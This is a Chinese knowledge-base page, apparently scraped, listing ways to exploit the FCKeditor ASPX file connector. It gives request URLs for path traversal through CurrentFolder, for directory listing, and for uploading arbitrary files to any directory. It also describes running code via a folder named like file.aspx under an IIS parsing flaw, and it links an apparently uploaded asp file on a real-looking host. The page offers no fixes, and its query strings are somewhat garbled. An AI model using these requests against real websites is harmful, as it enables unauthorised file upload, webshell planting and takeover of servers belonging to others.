主頁(yè) > 知識(shí)庫(kù) > FCKeditor 新聞組件的一些程序漏洞

FCKeditor 新聞組件的一些程序漏洞

熱門(mén)標(biāo)簽:企業(yè)電話(huà)機(jī)器人辦理 四平電話(huà)機(jī)器人哪家好 株洲外呼營(yíng)銷(xiāo)系統(tǒng)有哪些 長(zhǎng)春防封卡電銷(xiāo)卡套餐 智能電銷(xiāo)機(jī)器人真的好嗎 長(zhǎng)春銷(xiāo)售外呼系統(tǒng)業(yè)務(wù) 靈聲智能電話(huà)機(jī)器人招聘 天津電銷(xiāo)卡外呼系統(tǒng)線(xiàn)路 興化400電話(huà)辦理多少錢(qián)
1 CurrentFolder 參數(shù),可以在網(wǎng)站中不同目錄新建文件夾,參數(shù)使用 ../../來(lái)篡改參數(shù),進(jìn)入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolderType=ImageCurrentFolder=../../..%2FNewFolderName=aspx.asp


2 CurrentFolder 參數(shù),根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄,比如 “../../../”進(jìn)入不同的目錄,讓后通過(guò)XML返回的消息就可以看到?jīng)]有權(quán)限的頁(yè)面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFilesType=ImageCurrentFolder=%2F

3 上傳文件時(shí),通過(guò)修改CurrentFolder參數(shù),可以將文件上傳到不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=FileUploadType=ImageCurrentFolder=%2F

4 同時(shí)修改Type 和CurrentFolder 參數(shù),可以上傳任意類(lèi)型文件到網(wǎng)站任意目錄,基本上網(wǎng)站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUploadType=ImageCurrentFolder=%2F

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp



5 通過(guò)創(chuàng)建文件夾的功能,創(chuàng)建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實(shí)際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執(zhí)行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執(zhí)行。

標(biāo)簽:運(yùn)城 貴港 黑龍江 新疆 石嘴山 青海 漯河 巴彥淖爾

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《FCKeditor 新聞組件的一些程序漏洞》,本文關(guān)鍵詞  FCKeditor,新聞,組件,的,一些,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《FCKeditor 新聞組件的一些程序漏洞》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于FCKeditor 新聞組件的一些程序漏洞的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章